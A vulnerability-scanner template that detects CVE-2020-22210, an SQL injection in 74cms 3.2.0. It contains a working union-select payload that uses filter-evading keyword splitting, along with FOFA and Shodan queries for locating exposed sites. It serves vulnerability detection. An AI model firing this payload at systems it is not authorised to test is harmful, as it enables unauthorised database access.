id: CVE-2020-22210

info:
  name: 74cms - ajax_officebuilding.php SQL Injection
  author: ritikchaddha
  severity: critical
  verified: true
  description: |
    A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
    FOFA: app="74cms"
    SHODAN: http.html:"74cms"
  reference:
    - https://github.com/blindkey/cve_like/issues/11
    - https://nvd.nist.gov/vuln/detail/CVE-2020-22210
  tags: cve,cve2020,74cms,sqli
  created: 2023/06/16

set:
  num: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: GET
      path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23
    expression: response.body.bcontains(bytes(md5(string(num))))
expression: r0()